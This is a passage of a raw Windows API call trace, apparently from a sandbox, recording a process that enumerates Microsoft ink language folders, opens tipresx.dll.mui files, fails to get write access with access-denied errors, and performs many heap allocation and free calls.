Size=0x8) returned 0x7cf90 [0085.011] AreFileApisANSI () returned 1 [0085.011] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d9a0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0085.011] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85e40 [0085.011] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d9a0, cbMultiByte=-1, lpWideCharStr=0x85e40, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\it-IT\\tipresx.dll.mui") returned 73 [0085.011] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\it-IT\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\it-it\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0085.012] GetFileType (hFile=0x424) returned 0x1 [0085.012] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85e40 | out: hHeap=0x20000) returned 1 [0085.012] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0085.012] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0085.013] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0085.013] CloseHandle (hObject=0x424) returned 1 [0085.013] AreFileApisANSI () returned 1 [0085.013] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d9a0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0085.013] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85d00 [0085.013] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d9a0, cbMultiByte=-1, lpWideCharStr=0x85d00, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\it-IT\\tipresx.dll.mui") returned 73 [0085.013] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\it-IT\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\it-it\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.013] GetLastError () returned 0x5 [0085.013] GetLastError () returned 0x5 [0085.013] SetLastError (dwErrCode=0x5) [0085.013] GetLastError () returned 0x5 [0085.013] SetLastError (dwErrCode=0x5) [0085.013] GetLastError () returned 0x5 [0085.013] SetLastError (dwErrCode=0x5) [0085.013] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85d00 | out: hHeap=0x20000) returned 1 [0085.013] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0085.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0085.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d9a0 | out: hHeap=0x20000) returned 1 [0085.014] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.014] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.014] FindNextFileW (in: hFindFile=0x78c50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x90, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x50d00, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x90, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓⨀")) returned 0 [0085.014] FindClose (in: hFindFile=0x78c50 | out: hFindFile=0x78c50) returned 1 [0085.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0085.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0085.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0085.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0085.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e140 | out: hHeap=0x20000) returned 1 [0085.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0085.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e3e8 | out: hHeap=0x20000) returned 1 [0085.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0085.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0085.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45fd8 | out: hHeap=0x20000) returned 1 [0085.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0085.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0085.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0085.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0085.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0085.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0085.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0085.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0085.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0085.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f0b8 [0085.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0085.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e2d8 [0085.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f0b8 | out: hHeap=0x20000) returned 1 [0085.014] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.014] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.015] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.015] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.015] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e2d8 | out: hHeap=0x20000) returned 1 [0085.015] AreFileApisANSI () returned 1 [0085.015] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ja-JP", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ja-JP", lpUsedDefaultChar=0x0) returned 57 [0085.015] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0085.015] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.015] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.015] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0085.015] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0085.015] AreFileApisANSI () returned 1 [0085.015] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0085.015] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a3b0 [0085.015] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x6a3b0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ja-JP") returned 57 [0085.015] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ja-JP" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ja-jp"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.015] GetLastError () returned 0x5 [0085.015] GetLastError () returned 0x5 [0085.015] SetLastError (dwErrCode=0x5) [0085.015] GetLastError () returned 0x5 [0085.015] SetLastError (dwErrCode=0x5) [0085.015] GetLastError () returned 0x5 [0085.015] SetLastError (dwErrCode=0x5) [0085.015] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0085.016] AreFileApisANSI () returned 1 [0085.016] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0085.016] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x69db0 [0085.016] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x69db0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ja-JP") returned 57 [0085.016] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ja-JP" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ja-jp"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.016] GetLastError () returned 0x5 [0085.016] GetLastError () returned 0x5 [0085.016] SetLastError (dwErrCode=0x5) [0085.016] GetLastError () returned 0x5 [0085.016] SetLastError (dwErrCode=0x5) [0085.016] GetLastError () returned 0x5 [0085.016] SetLastError (dwErrCode=0x5) [0085.016] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0085.016] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0085.016] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0085.016] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0085.016] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.016] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.016] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.016] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.016] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76098 [0085.016] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f798 [0085.016] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0085.016] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e360 [0085.016] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f798 | out: hHeap=0x20000) returned 1 [0085.016] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa076a7a6, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3a0736, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="ko-KR", cAlternateFileName="")) returned 1 [0085.016] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0085.017] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0085.017] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e030 [0085.017] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e2d8 [0085.017] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ja-JP\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78c50 [0085.017] FindNextFileW (in: hFindFile=0x78c50, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa076a026, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3a0736, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0085.017] FindNextFileW (in: hFindFile=0x78c50, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e9592f9, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e9592f9, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e9592f9, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x1e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0085.017] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e2d8 | out: hHeap=0x20000) returned 1 [0085.017] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0085.017] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0085.017] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0085.017] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0085.017] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0085.017] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0085.017] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0085.017] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0085.017] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0085.017] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e7a0 [0085.017] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x45fd8 [0085.017] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e360 | out: hHeap=0x20000) returned 1 [0085.017] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0085.017] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0085.017] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0085.017] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0085.017] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0085.017] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0085.017] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0085.017] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0085.017] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0085.017] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e828 [0085.017] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0085.018] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x80a30 [0085.018] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e828 | out: hHeap=0x20000) returned 1 [0085.018] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0085.018] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x50cf8 [0085.018] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x80a30 | out: hHeap=0x20000) returned 1 [0085.018] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.018] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.018] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.018] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.018] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x50cf8 | out: hHeap=0x20000) returned 1 [0085.018] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0085.018] AreFileApisANSI () returned 1 [0085.018] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ja-JP\\tipresx.dll.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ja-JP\\tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 73 [0085.018] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6dc60 [0085.018] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.018] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.018] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0085.018] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0085.018] AreFileApisANSI () returned 1 [0085.018] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6dc60, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0085.018] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x858a0 [0085.018] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6dc60, cbMultiByte=-1, lpWideCharStr=0x858a0, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ja-JP\\tipresx.dll.mui") returned 73 [0085.018] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ja-JP\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ja-jp\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0085.019] GetFileType (hFile=0x424) returned 0x1 [0085.019] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x858a0 | out: hHeap=0x20000) returned 1 [0085.019] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0085.019] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0085.019] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0085.019] CloseHandle (hObject=0x424) returned 1 [0085.019] AreFileApisANSI () returned 1 [0085.019] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6dc60, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0085.019] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85b20 [0085.019] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6dc60, cbMultiByte=-1, lpWideCharStr=0x85b20, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ja-JP\\tipresx.dll.mui") returned 73 [0085.020] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ja-JP\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ja-jp\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.020] GetLastError () returned 0x5 [0085.020] GetLastError () returned 0x5 [0085.020] SetLastError (dwErrCode=0x5) [0085.020] GetLastError () returned 0x5 [0085.020] SetLastError (dwErrCode=0x5) [0085.020] GetLastError () returned 0x5 [0085.020] SetLastError (dwErrCode=0x5) [0085.020] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85b20 | out: hHeap=0x20000) returned 1 [0085.020] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0085.020] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0085.020] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6dc60 | out: hHeap=0x20000) returned 1 [0085.020] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.020] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.020] FindNextFileW (in: hFindFile=0x78c50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x90, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x50d00, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x90, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓Ḁ")) returned 0 [0085.020] FindClose (in: hFindFile=0x78c50 | out: hFindFile=0x78c50) returned 1 [0085.020] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0085.020] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0085.020] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0085.020] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0085.020] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e7a0 | out: hHeap=0x20000) returned 1 [0085.020] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0085.020] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e030 | out: hHeap=0x20000) returned 1 [0085.020] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0085.020] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0085.021] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45fd8 | out: hHeap=0x20000) returned 1 [0085.021] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0085.021] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0085.021] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0085.021] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0085.021] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0085.021] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0085.021] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0085.021] HeapFree (in: hHeap=0x20000, dwFlags=0x0, 